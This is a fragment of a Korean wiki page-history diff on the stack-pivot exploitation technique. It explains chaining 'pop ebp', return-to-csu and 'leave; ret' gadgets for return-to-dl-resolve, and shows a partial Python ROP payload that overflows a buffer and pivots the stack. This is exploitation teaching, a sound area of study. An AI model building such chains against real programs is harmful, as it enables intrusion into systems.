Page History

...

아래 Exploit 기법에서는 "POP ebp" Gadget과 "return-to-csu" gadget을 이용하여 EBP, RBP 레지스터의 값을 변경합니다.
그리고 Stack pivot Gadget인 "leave; ret"을 이용하여 Stack의 흐름을 변경하였습니다.
- Return-to-dl-resolve - x86
- Return-to-dl-resolve - x64(feat.Return-to-csu)

Code Block

title	Return-to-dl-resolve - x86

...
#read(0,base_stage,100)
#jmp base_stage
buf1 = 'A'* 62
buf1 += p32(addr_plt_read)
buf1 += p32(addr_pop3)
buf1 += p32(0)
buf1 += p32(base_stage)
buf1 += p32(100)
buf1 += p32(addr_pop_ebp)
buf1 += p32(base_stage)
buf1 += p32(addr_leave_ret)
...

...

Comments

HTML
<div class="fb-comments" data-href="https://www.lazenca.net/display/TEC/16.Stack+pivot" data-width="*" data-numposts="5"></div>

...

Page tree

Versions Compared

Old Version 2

New Version Current

Key

Comments